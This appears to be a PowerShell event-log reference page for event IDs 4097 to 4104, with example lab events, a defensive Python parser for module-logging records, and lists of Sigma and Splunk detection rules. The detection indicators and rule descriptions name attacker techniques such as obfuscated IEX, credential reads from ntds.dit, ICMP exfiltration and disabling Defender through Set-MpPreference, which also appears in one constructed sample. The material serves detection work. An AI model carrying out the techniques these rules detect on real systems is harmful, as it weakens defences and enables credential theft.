Microsoft-Windows-PowerShell
189 events across 3 channels
Event ID 4097: Computer Name $null or.
#Description
Computer Name $null or . resolve to LocalHost.
Message #
Event ID 4098: Resolving to default scheme http
#Description
Resolving to default scheme http.
Message #
Event ID 4099: Remote shell name resolved to default Microsoft.
#Description
Remote shell name resolved to default Microsoft.PowerShell.
Message #
Event ID 4100: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| ContextInfo | UnicodeString | Context |
| UserData | UnicodeString | |
| Payload | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4100,
"version": 1,
"level": 3,
"task": 106,
"opcode": 19,
"keywords": 0,
"time_created": "2026-06-13T05:24:22.6461352+00:00",
"event_record_id": 164816,
"correlation": {
"ActivityID": "{AA583517-FAF4-0001-383A-58AAF4FADC01}"
},
"execution": {
"process_id": 7180,
"thread_id": 7444
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ContextInfo": " Severity = Warning\n Host Name = ConsoleHost\n Host Version = 5.1.20348.558\n Host ID = f5117d22-3ce1-45ff-8086-de5eb4591327\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -NonInteractive -File C:\\ludus\\background\\set-bg.ps1\n Engine Version = 5.1.20348.558\n Runspace ID = d45fbe4a-06f2-475d-a9db-ab9fc6584c17\n Pipeline ID = 1\n Command Name = \n Command Type = \n Script Name = \n Command Path = \n Sequence Number = 19\n User = cell-c\\domainadmin\n Connected User = \n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "Error Message = System error.\n"
},
"message": "Error Message = System error.\r\n\r\n\r\nContext:\r\n Severity = Warning\r\n Host Name = ConsoleHost\r\n Host Version = 5.1.20348.558\r\n Host ID = f5117d22-3ce1-45ff-8086-de5eb4591327\r\n Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -NonInteractive -File C:\\ludus\\background\\set-bg.ps1\r\n Engine Version = 5.1.20348.558\r\n Runspace ID = d45fbe4a-06f2-475d-a9db-ab9fc6584c17\r\n Pipeline ID = 1\r\n Command Name = \r\n Command Type = \r\n Script Name = \r\n Command Path = \r\n Sequence Number = 19\r\n User = cell-c\\domainadmin\r\n Connected User = \r\n Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n"
}
Event ID 4101: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| ContextInfo | UnicodeString | |
| UserData | UnicodeString | |
| Payload | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "A0C1853B-5C40-4B15-8766-3CF1C58F985A",
"event_source_name": "",
"event_id": 4101,
"version": 1,
"level": 4,
"task": 0,
"opcode": 19,
"keywords": 9223372036854775840,
"time_created": "2026-03-13T19:32:29.608586+00:00",
"event_record_id": 149117,
"correlation": {
"ActivityID": "DF92C490-B30B-000C-6802-93DF0BB3DC01"
},
"execution": {
"process_id": 4068,
"thread_id": 956
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "LAB-WIN11.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ContextInfo": "Install",
"UserData": "Package=nuget, Version=2.8.5.208, Provider=Bootstrap, Source=https://cdn.oneget.org/providers/nuget-2.8.5.208.package.swidtag, Status=Installed, DestinationPath=",
"Payload": "PackageManagement: A package is installed."
},
"message": ""
}
Event ID 4102: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Type | Description |
|---|---|---|
| ContextInfo | UnicodeString | Context |
| UserData | UnicodeString | |
| Payload | UnicodeString | |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4102,
"version": 1,
"level": 3,
"task": 106,
"opcode": 19,
"keywords": 0,
"time_created": "2026-06-13T14:36:40.9609813+00:00",
"event_record_id": 291397,
"correlation": {
"ActivityID": "{C6821FB2-EF88-0004-5018-83C688EFDC01}"
},
"execution": {
"process_id": 1152,
"thread_id": 8008
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-a.cell-a.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ContextInfo": " Severity = Warning\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = e8ecf392-16f7-461a-9e04-2cf3b693e616\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.20348.558\n Runspace ID = 7d22a55e-f35a-436b-aadc-c65ab73a8891\n Pipeline ID = 4684\n Command Name = \n Command Type = \n Script Name = \n Command Path = \n Sequence Number = 82234\n User = cell-a\\domainadmin\n Connected User = cell-a\\domainadmin\n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "Error Message = Could not find the drive 'Z:\\'. The drive might not be ready or might not be mapped.\n\nProvider name = Microsoft.PowerShell.Core\\FileSystem\n"
},
"message": "Error Message = Could not find the drive 'Z:\\'. The drive might not be ready or might not be mapped.\r\n\r\nProvider name = Microsoft.PowerShell.Core\\FileSystem\r\n\r\n\r\nContext:\r\n Severity = Warning\r\n Host Name = ServerRemoteHost\r\n Host Version = 1.0.0.0\r\n Host ID = e8ecf392-16f7-461a-9e04-2cf3b693e616\r\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\r\n Engine Version = 5.1.20348.558\r\n Runspace ID = 7d22a55e-f35a-436b-aadc-c65ab73a8891\r\n Pipeline ID = 4684\r\n Command Name = \r\n Command Type = \r\n Script Name = \r\n Command Path = \r\n Sequence Number = 82234\r\n User = cell-a\\domainadmin\r\n Connected User = cell-a\\domainadmin\r\n Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n"
}
Event ID 4103: Payload Context: ContextInfo User Data: UserData.
#Description
Payload Context: ContextInfo User Data: UserData
Message #
Fields #
| Name | Type | Description | Rules |
|---|---|---|---|
| ContextInfo | UnicodeString | Context | 315 |
| UserData | UnicodeString | | |
| Payload | UnicodeString | | 400 |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4103,
"version": 1,
"level": 4,
"task": 106,
"opcode": 20,
"keywords": 0,
"time_created": "2026-06-13T14:11:14.9015833+00:00",
"event_record_id": 168285,
"correlation": {
"ActivityID": "{AA583517-FAF4-0000-BF5D-58AAF4FADC01}"
},
"execution": {
"process_id": 7864,
"thread_id": 1248
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
},
"event_data": {
"ContextInfo": " Severity = Informational\n Host Name = ServerRemoteHost\n Host Version = 1.0.0.0\n Host ID = aa212afc-f66e-4e09-a428-4989b19010a1\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n Engine Version = 5.1.20348.558\n Runspace ID = 55ce38e0-81ea-44db-9a08-0c9965b78525\n Pipeline ID = 10\n Command Name = ConvertTo-Json\n Command Type = Cmdlet\n Script Name = \n Command Path = \n Sequence Number = 52\n User = cell-c\\domainadmin\n Connected User = cell-c\\domainadmin\n Shell ID = Microsoft.PowerShell\n",
"UserData": "",
"Payload": "CommandInvocation(ConvertTo-Json): \"ConvertTo-Json\"\nParameterBinding(ConvertTo-Json): name=\"Depth\"; value=\"14\"\nParameterBinding(ConvertTo-Json): name=\"Compress\"; value=\"True\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; 
value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; 
value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\n"
},
"message": "CommandInvocation(ConvertTo-Json): \"ConvertTo-Json\"\r\nParameterBinding(ConvertTo-Json): name=\"Depth\"; value=\"14\"\r\nParameterBinding(ConvertTo-Json): name=\"Compress\"; value=\"True\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; 
value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): 
name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\nParameterBinding(ConvertTo-Json): name=\"InputObject\"; value=\"System.Collections.Specialized.OrderedDictionary\"\r\n\r\n\r\nContext:\r\n Severity = Informational\r\n Host Name = ServerRemoteHost\r\n Host Version = 1.0.0.0\r\n Host ID = aa212afc-f66e-4e09-a428-4989b19010a1\r\n Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\r\n Engine Version = 5.1.20348.558\r\n Runspace ID = 55ce38e0-81ea-44db-9a08-0c9965b78525\r\n Pipeline ID = 10\r\n Command Name = ConvertTo-Json\r\n Command Type = Cmdlet\r\n Script Name = \r\n Command Path = \r\n Sequence Number = 52\r\n User = cell-c\\domainadmin\r\n Connected User = cell-c\\domainadmin\r\n Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n"
}
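The ContextInfo and Payload strings above are the only place the module-logging event records who ran what: ContextInfo is a block of "Key = Value" lines (the same layout 4100 and 4102 use), and Payload is one CommandInvocation(...) line followed by one ParameterBinding(...) line per bound parameter, repeated once per pipeline object (hence the long run of InputObject bindings in the ConvertTo-Json sample). The following Python is an added example, not code from this page or from Microsoft: it parses both fields out of an exported event, keys the bindings by cmdlet and parameter, and applies two simple checks, an allowlist of expected host binaries in the spirit of the "Alternate PowerShell Hosts" rule listed below (the allowlist and the simplified logic are assumptions, not that rule's exact conditions) and the Payload substrings from the Common Indicators table. The two sample events are constructed, trimmed copies in the shape of the examples on this page; C:\Tools\updater.exe is a made-up host path.

```python
import re

# Constructed sample: a trimmed copy of the 4103 example above (remoting session).
SAMPLE_REMOTING = {
    "system": {"event_id": 4103, "computer": "telemetry-DC-c.cell-c.ludus.domain"},
    "event_data": {
        "ContextInfo": (
            " Severity = Informational\n Host Name = ServerRemoteHost\n"
            " Host Application = C:\\Windows\\system32\\wsmprovhost.exe -Embedding\n"
            " Command Name = ConvertTo-Json\n Command Type = Cmdlet\n"
            " User = cell-c\\domainadmin\n Connected User = cell-c\\domainadmin\n"
            " Shell ID = Microsoft.PowerShell\n"
        ),
        "UserData": "",
        "Payload": (
            'CommandInvocation(ConvertTo-Json): "ConvertTo-Json"\n'
            'ParameterBinding(ConvertTo-Json): name="Depth"; value="14"\n'
            'ParameterBinding(ConvertTo-Json): name="Compress"; value="True"\n'
        ),
    },
}

# Constructed sample: a local session hosted by a made-up binary that is not a
# PowerShell host we expect, disabling Defender real-time monitoring.
SAMPLE_ALT_HOST = {
    "system": {"event_id": 4103, "computer": "LAB-WIN11.ludus.domain"},
    "event_data": {
        "ContextInfo": (
            " Severity = Informational\n Host Name = CustomHost\n"
            " Host Application = C:\\Tools\\updater.exe\n"
            " Command Name = Set-MpPreference\n Command Type = Cmdlet\n"
            " User = LAB-WIN11\\user\n Connected User = \n"
            " Shell ID = Microsoft.PowerShell\n"
        ),
        "UserData": "",
        "Payload": (
            'CommandInvocation(Set-MpPreference): "Set-MpPreference"\n'
            'ParameterBinding(Set-MpPreference): name="DisableRealtimeMonitoring"; value="True"\n'
        ),
    },
}

INVOCATION_RE = re.compile(r'^CommandInvocation\((?P<cmd>[^)]*)\): "(?P<text>.*)"$')
BINDING_RE = re.compile(
    r'^ParameterBinding\((?P<cmd>[^)]*)\): name="(?P<name>[^"]*)"; value="(?P<value>.*)"$'
)

# Assumed allowlist of host binaries we expect in Host Application. Anything else is
# reported as an alternate host; this is a simplification, not the exact logic of
# the "Alternate PowerShell Hosts" Sigma rule listed below.
EXPECTED_HOSTS = ("powershell.exe", "powershell_ise.exe", "pwsh.exe", "wsmprovhost.exe")

# Payload substrings from the Common Indicators table for this event.
PAYLOAD_INDICATORS = ("-itemproperty", "set-mppreference", "add-mppreference", ".dll")


def parse_context_info(text):
    """ContextInfo is a block of ' Key = Value' lines; return it as a dict."""
    ctx = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            ctx[key.strip()] = value.strip()
    return ctx


def parse_payload(text):
    """Split Payload into invoked command names and (cmd, parameter, value) bindings."""
    invocations, bindings = [], []
    for line in text.splitlines():
        m = INVOCATION_RE.match(line)
        if m:
            invocations.append(m.group("cmd"))
            continue
        m = BINDING_RE.match(line)
        if m:
            bindings.append((m.group("cmd"), m.group("name"), m.group("value")))
    return invocations, bindings


def analyze_4103(event):
    """Flatten one exported 4103 event into the fields an analyst pivots on, plus findings."""
    data = event["event_data"]
    ctx = parse_context_info(data["ContextInfo"])
    invocations, bindings = parse_payload(data["Payload"])
    host_app = ctx.get("Host Application", "")
    findings = []
    if host_app and not any(h in host_app.lower() for h in EXPECTED_HOSTS):
        findings.append("alternate-host:" + host_app)
    payload_lc = data["Payload"].lower()
    findings += ["payload-contains:" + s for s in PAYLOAD_INDICATORS if s in payload_lc]
    return {
        "computer": event["system"]["computer"],
        "user": ctx.get("User"),
        "connected_user": ctx.get("Connected User") or None,   # empty for local sessions
        "remoting": ctx.get("Host Name") == "ServerRemoteHost",
        "host_application": host_app,
        "invocations": invocations,
        "parameters": {f"{cmd}.{name}": value for cmd, name, value in bindings},
        "findings": findings,
    }


if __name__ == "__main__":
    for sample in (SAMPLE_REMOTING, SAMPLE_ALT_HOST):
        result = analyze_4103(sample)
        print(result["computer"], result["user"], result["invocations"], result["findings"])
```

Bindings are keyed by cmdlet and parameter name, so the repeated InputObject bindings of a pipeline collapse to the last value; keep the raw list from parse_payload if the object count matters. Connected User is empty for local sessions and populated for WinRM sessions (Host Name = ServerRemoteHost, hosted by wsmprovhost.exe), which is why the remoting flag is derived from Host Name rather than from the user fields.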
Detection Patterns #
132 rules
Sigma
Common Indicators #
Field/value combinations most frequently checked by detection rules targeting this event, derived from cross-vendor predicate analysis.
| Field | Kind | Value | Rules | Vendors |
|---|---|---|---|---|
| EventData | contains | -itemproperty | 5 rules | sigma |
| Payload | contains | -itemproperty | 5 rules | sigma |
| ScriptBlockText | contains | -itemproperty | 5 rules | sigma |
| signature_id | eq | 4104 | 4 rules | splunk |
| EventData | contains | set-mppreference | 3 rules | sigma |
| ScriptBlockText | contains | name | 3 rules | sigma |
| EventData | contains | .dll | 3 rules | sigma |
| EventData | contains | name | 3 rules | sigma |
| Payload | contains | .dll | 3 rules | sigma |
| Payload | contains | name | 3 rules | sigma |
| ScriptBlockText | contains | .dll | 3 rules | sigma |
| CommandLine | match | (?i)\w+tps?://\S+\.msi | 2 rules | splunk |
| process_name | match | (?i)hh\.exe | 2 rules | splunk |
| EventData | contains | add-mppreference | 2 rules | sigma |
| ScriptBlockText | contains | set-mppreference | 2 rules | sigma |
Detection Rules #
Sigma #
- Potential Active Directory Enumeration Using AD Module - PsModule source medium: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration.
- Alternate PowerShell Hosts - PowerShell Module source medium: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
- Bad Opsec Powershell Code Artifacts source critical: focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.
(20 of 34 rules shown)
- Clear PowerShell History - PowerShell Module source medium: Detects keywords that could indicate clearing PowerShell history
- PowerShell Decompress Commands source informational: A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.
- Malicious PowerShell Scripts - PoshModule source high: Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance
- Suspicious Get-ADDBAccount Usage source high: Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers
- PowerShell Get Clipboard source medium: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.
- HackTool - Evil-WinRm Execution - PowerShell Module source high: Detects the execution of Evil-WinRM via PowerShell Module logs by leveraging the hardcoded strings inside the utility.
- Invoke-Obfuscation CLIP+ Launcher - PowerShell Module source high: Detects Obfuscated use of Clip.exe to execute PowerShell
- Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module source high: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
- Invoke-Obfuscation STDIN+ Launcher - PowerShell Module source high: Detects Obfuscated use of stdin to execute PowerShell
- Invoke-Obfuscation VAR+ Launcher - PowerShell Module source high: Detects Obfuscated use of Environment Variables to execute PowerShell
- Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module source medium: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
- Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module source medium: Detects Obfuscated Powershell via RUNDLL LAUNCHER
- Invoke-Obfuscation Via Stdin - PowerShell Module source high: Detects Obfuscated Powershell via Stdin in Scripts
- Invoke-Obfuscation Via Use Clip - PowerShell Module source high: Detects Obfuscated Powershell via use Clip.exe in Scripts
- Invoke-Obfuscation Via Use MSHTA - PowerShell Module source high: Detects Obfuscated Powershell via use MSHTA in Scripts
- Invoke-Obfuscation Via Use Rundll32 - PowerShell Module source high: Detects Obfuscated Powershell via use Rundll32 in Scripts
- Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module source high: Detects Obfuscated Powershell via VAR++ LAUNCHER
Splunk #
- Command-Line Interface Execution (PowerShell) source: Detects when a Command-Line Interface executes on a host
- Command Line Utility Added to Accessibility Features (PowerShell) source: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has…
- MSHTA.exe execution (PowerShell) source: Detect use of MSHTA
- Obfuscated Powershell Techniques (PowerShell) source: Attackers and commodity malware have started using extremely basic obfuscation techniques to hide the majority of the command from the command line arguments of powershell.exe. This use case relies on URL Toolbox to function
- PowerHuntShares Commands (PowerShell) source: Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks…
- Powershell ICMP Data Exfiltration (PowerShell) source: Adversaries may steal data by exfiltrating it over an existing command and control channel. Use case attempts to detect powershell scripts with specific ICMP calls that may be attributed to data exfil
- Suspicious AteraAgent Installation - Windows (PowerShell) source: An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These remote monitoring and management (RMM) tools, such as AteraAgent,…
- Suspicious Powershell (PowerShell) source: PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary. This use case attempts to identify those powershell executions launched by a binary other than powershell
- WebLogic CVE-2017-10271 (PowerShell) source: A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host and in this case the session is created using the vulnerability of Weblogic app - wls-wsat Component…
Event ID 4104: Creating Scriptblock text (MessageNumber of MessageTotal).
#Description
Creating Scriptblock text (MessageNumber of MessageTotal).
Message #
Fields #
| Name | Type | Description | Rules |
|---|---|---|---|
| MessageNumber | Int32 | Part number of the current script block fragment (large scripts are split across multiple events) | |
| MessageTotal | Int32 | Total number of script block fragments for the complete script | |
| ScriptBlockText | UnicodeString | Content of the executed PowerShell script block, or this fragment of it | 1883 |
| ScriptBlockId | UnicodeString | GUID of the script block; every fragment of one block carries the same ID, which is the key for reassembling it | |
| Path | UnicodeString | Full path to the executed script file; empty when the block did not come from a file on disk (as in the example below) | 3 |
Example Event #
{
"system": {
"provider": "Microsoft-Windows-PowerShell",
"guid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}",
"event_source_name": "",
"event_id": 4104,
"version": 1,
"level": 5,
"task": 2,
"opcode": 15,
"keywords": 0,
"time_created": "2026-06-13T14:11:14.9274534+00:00",
"event_record_id": 168286,
"correlation": {
"ActivityID": "{AA583517-FAF4-0004-3DE7-58AAF4FADC01}"
},
"execution": {
"process_id": 7864,
"thread_id": 7844
},
"channel": "Microsoft-Windows-PowerShell/Operational",
"computer": "telemetry-DC-c.cell-c.ludus.domain",
"security": {
"user_id": "S-1-5-21-1006758700-2167138679-1475694448-1105"
}
